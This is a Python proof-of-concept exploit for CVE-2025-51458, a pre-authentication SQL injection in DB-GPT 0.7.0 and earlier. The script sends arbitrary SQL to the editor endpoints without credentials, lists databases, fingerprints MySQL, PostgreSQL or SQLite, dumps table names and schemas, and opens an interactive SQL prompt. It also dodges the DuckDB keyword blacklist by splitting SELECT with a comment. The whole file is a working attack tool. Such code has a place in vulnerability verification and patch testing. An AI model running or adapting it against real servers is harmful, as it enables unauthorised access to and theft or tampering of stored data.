#!/usr/bin/env python3 """ CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection Affected: eosphoros-ai/DB-GPT <= 0.7.0 Endpoint: /api/v1/editor/sql/run, /api/v1/editor/chart/run Type: Pre-Auth SQL Injection (bypass of CVE-2024-10835 / CVE-2024-10901 fix) The sanitize_sql blacklist only covers DuckDB. MySQL/PostgreSQL/SQLite connections pass raw SQL directly to query_ex() with no filtering. DuckDB blacklist can be bypassed with comment obfuscation (SEL/**/ECT). Usage: python3 exp.py [--sql "SELECT ..."] python3 exp.py --dump-tables python3 exp.py --dump-db python3 exp.py --list-dbs """ import argparse import json import sys import requests def sql_run(target, db_name, sql): url = f"{target.rstrip('/')}/api/v1/editor/sql/run" payload = {"db_name": db_name, "sql": sql} try: r = requests.post(url, json=payload, timeout=30) data = r.json() if data.get("success"): result = data.get("data", {}) columns = result.get("colunms", []) values = result.get("values", []) return columns, values else: print(f"[-] Error: {data.get('err_msg', 'unknown')}", file=sys.stderr) return None, None except Exception as e: print(f"[-] Request failed: {e}", file=sys.stderr) return None, None def chart_run(target, db_name, sql, chart_type="bar"): url = f"{target.rstrip('/')}/api/v1/editor/chart/run" payload = {"db_name": db_name, "sql": sql, "chart_type": chart_type} try: r = requests.post(url, json=payload, timeout=30) data = r.json() if data.get("success"): return data.get("data", {}) else: print(f"[-] Error: {data.get('err_msg', 'unknown')}", file=sys.stderr) return None except Exception as e: print(f"[-] Request failed: {e}", file=sys.stderr) return None def list_databases(target): url = f"{target.rstrip('/')}/api/v1/editor/db/list" try: r = requests.get(url, timeout=10) data = r.json() if data.get("success"): return data.get("data", []) return None except Exception as e: print(f"[-] Request failed: {e}", file=sys.stderr) return None def print_table(columns, values): if not columns: return widths = [len(str(c)) for c in columns] for row in values: for i, v in enumerate(row): widths[i] = max(widths[i], len(str(v) if v else "NULL")) header = " | ".join(str(c).ljust(widths[i]) for i, c in enumerate(columns)) sep = "-+-".join("-" * w for w in widths) print(header) print(sep) for row in values: line = " | ".join( str(v if v else "NULL").ljust(widths[i]) for i, v in enumerate(row) ) print(line) print(f"\n({len(values)} rows)") def detect_db_type(target, db_name): # Try MySQL cols, vals = sql_run(target, db_name, "SELECT VERSION()") if cols and vals: version = str(vals[0][0]).lower() if "mariadb" in version or "." in version: return "mysql" if "mariadb" not in version else "mariadb" # Try PostgreSQL cols, vals = sql_run(target, db_name, "SELECT version()") if cols and vals and "postgresql" in str(vals[0][0]).lower(): return "postgresql" # Try SQLite cols, vals = sql_run(target, db_name, "SELECT sqlite_version()") if cols and vals: return "sqlite" return "unknown" def main(): parser = argparse.ArgumentParser( description="CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection" ) parser.add_argument("target", help="Target URL (e.g. http://localhost:5670)") parser.add_argument("db_name", nargs="?", help="Database name") parser.add_argument("--sql", help="Custom SQL to execute") parser.add_argument( "--list-dbs", action="store_true", help="List available databases" ) parser.add_argument( "--dump-tables", action="store_true", help="Dump table names" ) parser.add_argument( "--dump-db", action="store_true", help="Dump all table structures" ) parser.add_argument( "--chart", action="store_true", help="Use chart endpoint instead" ) parser.add_argument( "--duckdb-bypass", action="store_true", help="Use comment obfuscation for DuckDB", ) args = parser.parse_args() print(f"[*] CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection") print(f"[*] Target: {args.target}") if args.list_dbs: dbs = list_databases(args.target) if dbs: print(f"\n[+] Found {len(dbs)} database(s):") for db in dbs: name = db.get("db_name", db) if isinstance(db, dict) else db db_type = db.get("db_type", "?") if isinstance(db, dict) else "?" print(f" - {name} ({db_type})") else: print("[-] No databases found or endpoint not accessible") return if not args.db_name: parser.error("db_name is required unless using --list-dbs") if args.sql: sql = args.sql if args.duckdb_bypass: sql = sql.replace("SELECT", "SEL/**/ECT") print(f"[*] Executing: {sql}\n") cols, vals = sql_run(args.target, args.db_name, sql) if cols: print_table(cols, vals) return if args.dump_tables: db_type = detect_db_type(args.target, args.db_name) print(f"[*] Detected DB type: {db_type}") if db_type in ("mysql", "mariadb"): sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = DATABASE()" elif db_type == "postgresql": sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = 'public'" elif db_type == "sqlite": sql = "SELECT name FROM sqlite_master WHERE type='table'" else: sql = "SELECT table_name FROM information_schema.tables" print(f"[*] Dumping tables...\n") cols, vals = sql_run(args.target, args.db_name, sql) if cols: print_table(cols, vals) return if args.dump_db: db_type = detect_db_type(args.target, args.db_name) print(f"[*] Detected DB type: {db_type}") if db_type in ("mysql", "mariadb"): sql = ( "SELECT table_name, column_name, data_type " "FROM information_schema.columns " "WHERE table_schema = DATABASE() " "ORDER BY table_name, ordinal_position" ) elif db_type == "postgresql": sql = ( "SELECT table_name, column_name, data_type " "FROM information_schema.columns " "WHERE table_schema = 'public' " "ORDER BY table_name, ordinal_position" ) elif db_type == "sqlite": # SQLite: get tables first, then PRAGMA for each cols, vals = sql_run( args.target, args.db_name, "SELECT name FROM sqlite_master WHERE type='table'", ) if cols and vals: for row in vals: table = row[0] print(f"\n[*] Table: {table}") tc, tv = sql_run( args.target, args.db_name, f"PRAGMA table_info('{table}')", ) if tc: print_table(tc, tv) return else: sql = "SELECT table_name, column_name, data_type FROM information_schema.columns" print(f"[*] Dumping schema...\n") cols, vals = sql_run(args.target, args.db_name, sql) if cols: print_table(cols, vals) return # Default: interactive mode print(f"[*] Database: {args.db_name}") print(f"[*] Interactive SQL mode. Type 'exit' to quit.\n") while True: try: sql = input("SQL> ").strip() except (EOFError, KeyboardInterrupt): print() break if not sql or sql.lower() == "exit": break if args.duckdb_bypass: sql = sql.replace("SELECT", "SEL/**/ECT") cols, vals = sql_run(args.target, args.db_name, sql) if cols: print_table(cols, vals) print() if __name__ == "__main__": main()